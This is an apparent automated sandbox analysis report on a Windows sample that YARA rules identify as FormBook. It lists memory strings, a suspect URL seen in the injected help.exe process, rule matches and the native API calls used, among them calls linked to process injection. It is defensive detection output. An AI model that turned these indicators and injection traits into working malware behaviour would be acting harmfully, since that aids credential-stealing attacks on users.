          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&ut
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405042

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004181D0 NtCreateFile,2_2_004181D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00418280 NtReadFile,2_2_00418280
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00418300 NtClose,2_2_00418300
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,2_2_004183B0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004181CE NtCreateFile,2_2_004181CE
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041827A NtReadFile,2_2_0041827A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004183AB NtAllocateVirtualMemory,2_2_004183AB
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B198F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00B198F0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00B19860
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19840 NtDelayExecution,LdrInitializeThunk,2_2_00B19840
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B199A0 NtCreateSection,LdrInitializeThunk,2_2_00B199A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00B19910
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A20 NtResumeThread,LdrInitializeThunk,2_2_00B19A20
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00B19A00
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A50 NtCreateFile,LdrInitializeThunk,2_2_00B19A50
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B195D0 NtClose,LdrInitializeThunk,2_2_00B195D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19540 NtReadFile,LdrInitializeThunk,2_2_00B19540
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B196E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00B196E0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00B19660
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B197A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00B197A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19780 NtMapViewOfSection,LdrInitializeThunk,2_2_00B19780
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19FE0 NtCreateMutant,LdrInitializeThunk,2_2_00B19FE0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19710 NtQueryInformationToken,LdrInitializeThunk,2_2_00B19710
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B198A0 NtWriteVirtualMemory,2_2_00B198A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19820 NtEnumerateKey,2_2_00B19820
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1B040 NtSuspendThread,2_2_00B1B040
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B199D0 NtCreateProcessEx,2_2_00B199D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19950 NtQueueApcThread,2_2_00B19950
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A80 NtOpenDirectoryObject,2_2_00B19A80
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19A10 NtQuerySection,2_2_00B19A10
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1A3B0 NtGetContextThread,2_2_00B1A3B0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19B00 NtSetValueKey,2_2_00B19B00
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B195F0 NtQueryInformationFile,2_2_00B195F0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1AD30 NtSetContextThread,2_2_00B1AD30
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19520 NtWaitForSingleObject,2_2_00B19520
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19560 NtWriteFile,2_2_00B19560
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B196D0 NtCreateKey,2_2_00B196D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19610 NtEnumerateValueKey,2_2_00B19610
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19670 NtQueryInformationProcess,2_2_00B19670
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19650 NtQueryValueKey,2_2_00B19650
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19730 NtQueryVirtualMemory,2_2_00B19730
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1A710 NtOpenProcessToken,2_2_00B1A710
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19770 NtSetInformationFile,2_2_00B19770
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B1A770 NtOpenThread,2_2_00B1A770
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B19760 NtOpenProcess,2_2_00B19760
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_004181D0 NtCreateFile,2_1_004181D0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_00418280 NtReadFile,2_1_00418280
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_00418300 NtClose,2_1_00418300
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_004183B0 NtAllocateVirtualMemory,2_1_004183B0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_004181CE NtCreateFile,2_1_004181CE
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041827A NtReadFile,2_1_0041827A
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_004183AB NtAllocateVirtualMemory,2_1_004183AB
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79860 NtQuerySystemInformation,LdrInitializeThunk,11_2_00B79860
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79840 NtDelayExecution,LdrInitializeThunk,11_2_00B79840
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B799A0 NtCreateSection,LdrInitializeThunk,11_2_00B799A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B795D0 NtClose,LdrInitializeThunk,11_2_00B795D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_00B79910
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79540 NtReadFile,LdrInitializeThunk,11_2_00B79540
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B796E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_00B796E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B796D0 NtCreateKey,LdrInitializeThunk,11_2_00B796D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_00B79660
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A50 NtCreateFile,LdrInitializeThunk,11_2_00B79A50
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79650 NtQueryValueKey,LdrInitializeThunk,11_2_00B79650
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79780 NtMapViewOfSection,LdrInitializeThunk,11_2_00B79780
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79FE0 NtCreateMutant,LdrInitializeThunk,11_2_00B79FE0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79710 NtQueryInformationToken,LdrInitializeThunk,11_2_00B79710
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B798A0 NtWriteVirtualMemory,11_2_00B798A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B798F0 NtReadVirtualMemory,11_2_00B798F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79820 NtEnumerateKey,11_2_00B79820
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7B040 NtSuspendThread,11_2_00B7B040
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B795F0 NtQueryInformationFile,11_2_00B795F0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B799D0 NtCreateProcessEx,11_2_00B799D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7AD30 NtSetContextThread,11_2_00B7AD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79520 NtWaitForSingleObject,11_2_00B79520
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79560 NtWriteFile,11_2_00B79560
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79950 NtQueueApcThread,11_2_00B79950
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A80 NtOpenDirectoryObject,11_2_00B79A80
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A20 NtResumeThread,11_2_00B79A20
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79610 NtEnumerateValueKey,11_2_00B79610
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A10 NtQuerySection,11_2_00B79A10
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79A00 NtProtectVirtualMemory,11_2_00B79A00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79670 NtQueryInformationProcess,11_2_00B79670
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7A3B0 NtGetContextThread,11_2_00B7A3B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B797A0 NtUnmapViewOfSection,11_2_00B797A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79730 NtQueryVirtualMemory,11_2_00B79730
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7A710 NtOpenProcessToken,11_2_00B7A710
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79B00 NtSetValueKey,11_2_00B79B00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79770 NtSetInformationFile,11_2_00B79770
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B7A770 NtOpenThread,11_2_00B7A770
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B79760 NtOpenProcess,11_2_00B79760
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004181D0 NtCreateFile,11_2_004181D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00418280 NtReadFile,11_2_00418280
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00418300 NtClose,11_2_00418300
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004183B0 NtAllocateVirtualMemory,11_2_004183B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004181CE NtCreateFile,11_2_004181CE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041827A NtReadFile,11_2_0041827A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004183AB NtAllocateVirtualMemory,11_2_004183AB
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040323C
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_004048530_2_00404853
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_004061310_2_00406131
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_73611A980_2_73611A98
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041C0A92_2_0041C0A9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041C1CD2_2_0041C1CD
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B9922_2_0041B992
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041C2A72_2_0041C2A7
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041A3022_2_0041A302
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00408C6B2_2_00408C6B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00408C702_2_00408C70
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041B4B32_2_0041B4B3
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_0041BD9E2_2_0041BD9E
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B020A02_2_00B020A0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA20A82_2_00BA20A8
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEB0902_2_00AEB090
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B910022_2_00B91002
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF41202_2_00AF4120
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADF9002_2_00ADF900
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0EBB02_2_00B0EBB0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE841F2_2_00AE841F
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B025812_2_00B02581
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AED5E02_2_00AED5E0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD0D202_2_00AD0D20
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA1D552_2_00BA1D55
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA2EF72_2_00BA2EF7
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF6E302_2_00AF6E30
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_004010302_1_00401030
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041C0A92_1_0041C0A9
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041C1CD2_1_0041C1CD
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B9922_1_0041B992
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041C2A72_1_0041C2A7
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041A3022_1_0041A302
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_00408C6B2_1_00408C6B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_00408C702_1_00408C70
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_1_0041B4B32_1_0041B4B3
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B620A011_2_00B620A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4B09011_2_00B4B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C020A811_2_00C020A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4841F11_2_00B4841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BF100211_2_00BF1002
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C025DD11_2_00C025DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6258111_2_00B62581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B4D5E011_2_00B4D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B30D2011_2_00B30D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C01D5511_2_00C01D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B5412011_2_00B54120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B3F90011_2_00B3F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C02D0711_2_00C02D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C02EF711_2_00C02EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C022AE11_2_00C022AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B56E3011_2_00B56E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00B6EBB011_2_00B6EBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C01FF111_2_00C01FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00BFDBD211_2_00BFDBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00C02B2811_2_00C02B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0041A30211_2_0041A302
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00408C6B11_2_00408C6B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00408C7011_2_00408C70
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00402D8711_2_00402D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00402D9011_2_00402D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_00402FB011_2_00402FB0
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: String function: 00419F80 appears 34 times
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: String function: 00ADB150 appears 35 times
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B3B150 appears 35 times
          Source: 5t2CmTUhKc.exe, 00000000.00000003.340429454.0000000009AFF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5t2CmTUhKc.exe
          Source: 5t2CmTUhKc.exe, 00000002.00000002.417241372.0000000000D5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5t2CmTUhKc.exe
          Source: 5t2CmTUhKc.exe, 00000002.00000002.416438453.0000000000AA4000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs 5t2CmTUhKc.exe
          Source: 5t2CmTUhKc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
